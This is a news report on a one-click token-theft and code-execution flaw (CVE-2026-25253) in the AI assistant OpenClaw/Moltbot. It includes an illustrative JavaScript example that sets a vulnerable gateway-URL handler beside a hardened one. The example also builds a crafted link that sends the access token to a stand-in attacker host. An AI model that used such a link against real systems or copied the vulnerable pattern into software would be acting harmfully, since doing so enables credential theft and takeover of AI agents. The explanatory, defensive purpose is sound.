AI bot: high-risk code execution vulnerability in OpenClaw (Moltbot)
The AI bot OpenClaw, also known as Moltbot, can do a great deal on users' computers. A vulnerability that lets attackers run their own code through it is therefore all the more serious.
The AI assistant OpenClaw, also known as Moltbot and formerly Clawdbot, contains a serious security vulnerability. Attackers can use it to steal authentication tokens and ultimately execute arbitrary code on a victim's gateway.
In the vulnerability description, developer Peter Steinberger explains that the control user interface trusts the gatewayUrl parameter of a request without any verification and automatically connects to that address when the page loads. It then transmits the access token to whatever gateway it has connected to as part of the WebSocket connection data. A click on a prepared link or a visit to a malicious website is therefore enough to deliver the token to an attacker-controlled server, and with that token the attacker can log in to the victim's real gateway. Once logged in, they can change the configuration, for example the sandbox and tool policies, and execute actions with elevated privileges (CVE-2026-25253, CVSS 8.8, risk "high").
This makes it a one-click code execution vulnerability. Because the victim's own web browser acts as the bridge, attackers can exploit the vulnerability even if the gateway is bound only to the loopback interface: the connection is made from the victim's machine, not from the attacker's. Versions of OpenClaw/Moltbot up to and including 2026.1.28 are affected. Version 2026.1.29 closes the security hole. Anyone who has installed the AI bot should therefore update to the corrected version as soon as possible.
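The trust problem described above, as an added illustration that is not OpenClaw's own code: a control UI that takes its WebSocket target from the gatewayUrl query parameter and sends its token in the connect data, next to a hardened version that ignores the parameter unless it names the page's own host or an explicitly allowlisted one. The page origin, the token, the function names and the shape of the connect frame are assumptions made for this example; how the real project validates the parameter in 2026.1.29 is not described here.

```javascript
// Added example, not OpenClaw's own code. PAGE_ORIGIN, ACCESS_TOKEN, the
// function names and the connect-frame shape are assumptions for illustration.

// Constructed sample data: where the control UI page was served from, and
// the token it holds. Neither is a real OpenClaw value.
const PAGE_ORIGIN = "http://127.0.0.1:18789";
const ACCESS_TOKEN = "example-token-not-real";

// The gateway that served the page, expressed as a WebSocket URL
// (http -> ws, https -> wss). Yields "ws://127.0.0.1:18789/" here.
function defaultGatewayUrl(pageOrigin) {
  return new URL(pageOrigin.replace(/^http/, "ws")).toString();
}

// Vulnerable pattern: whatever ?gatewayUrl= says becomes the WebSocket
// target. The value is attacker-controlled as soon as the victim follows
// a link to the UI with a crafted query string.
function pickGatewayUrlVulnerable(search, pageOrigin) {
  const fromQuery = new URLSearchParams(search).get("gatewayUrl");
  return fromQuery || defaultGatewayUrl(pageOrigin);
}

// Hardened pattern: the parameter is only honoured when it parses as a
// ws(s) URL whose host:port is the page's own host or on an explicit
// allowlist. Anything else is discarded and the UI connects to its own
// origin, exactly as if the parameter had not been present.
function pickGatewayUrlHardened(search, pageOrigin, allowedHosts = []) {
  const fallback = defaultGatewayUrl(pageOrigin);
  const candidate = new URLSearchParams(search).get("gatewayUrl");
  if (!candidate) return fallback;
  let target;
  try {
    target = new URL(candidate);
  } catch {
    return fallback; // not even a URL
  }
  if (target.protocol !== "ws:" && target.protocol !== "wss:") return fallback;
  const allowed = new Set([new URL(pageOrigin).host, ...allowedHosts]);
  if (!allowed.has(target.host)) return fallback; // host AND port must match
  return target.toString();
}

// Stands in for opening the socket: returns the endpoint the UI would have
// connected to and the first frame it would have sent. The token travels
// in that connection data, so whoever owns the endpoint receives it.
function simulateConnect(pickGatewayUrl, search, pageOrigin = PAGE_ORIGIN) {
  const target = pickGatewayUrl(search, pageOrigin);
  const connectFrame = { type: "connect", token: ACCESS_TOKEN }; // assumed shape
  const pageHost = new URL(pageOrigin).host;
  return {
    target,
    connectFrame,
    tokenLeaks: new URL(target).host !== pageHost, // true = sent to a third party
  };
}

// The link an attacker would have the victim click: the normal UI page,
// but with the query string pointing it at the attacker's WebSocket server.
const MALICIOUS_SEARCH =
  "?gatewayUrl=" + encodeURIComponent("wss://attacker.example/ws");

console.log("vulnerable:", simulateConnect(pickGatewayUrlVulnerable, MALICIOUS_SEARCH));
console.log("hardened:  ", simulateConnect(pickGatewayUrlHardened, MALICIOUS_SEARCH));
```

Run it with node to see the vulnerable variant hand the token to attacker.example and the hardened variant connect back to 127.0.0.1:18789 instead. The hardened check compares host and port as one string, so an allowlist entry has to spell out the port, and it falls back silently rather than throwing so that a tampered link degrades to the normal UI rather than to an error page; both choices are design decisions of this example, not of the project.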
Moltbot: Powerful AI Bot
The AI assistant, originally named "Clawdbot" and then renamed "Moltbot" because of the similarity to Anthropic's AI Claude, has triggered enormous hype. On GitHub alone it had garnered almost 150,000 stars at the time of reporting, another significant increase since last week. The assistant is very powerful and can perform many actions, including ones with high privileges directly on the system where it is installed. c't 3003 took a closer look at the AI bot in its latest episode and spoke with its Viennese developer, Peter Steinberger.
(dmk)